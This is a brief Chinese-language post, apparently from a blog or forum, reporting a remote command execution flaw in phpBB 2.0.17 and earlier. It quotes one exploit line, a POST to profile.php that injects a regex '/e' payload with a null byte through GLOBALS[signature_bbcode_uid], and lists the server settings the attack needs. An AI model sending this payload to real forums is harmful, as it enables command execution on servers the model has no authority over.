phpbb又出新漏洞了

可以远程执行任意命令

<= 2.0.17版本的都有

res = $xpl->post(
$path.’profile.php?GLOBALS[signature_bbcode_uid]=(.%2B)/e%00′,

需要的条件是:

# 1. PHP 5 < 5.0.5
# 2. register_globals=On
# 3. magic_quotes off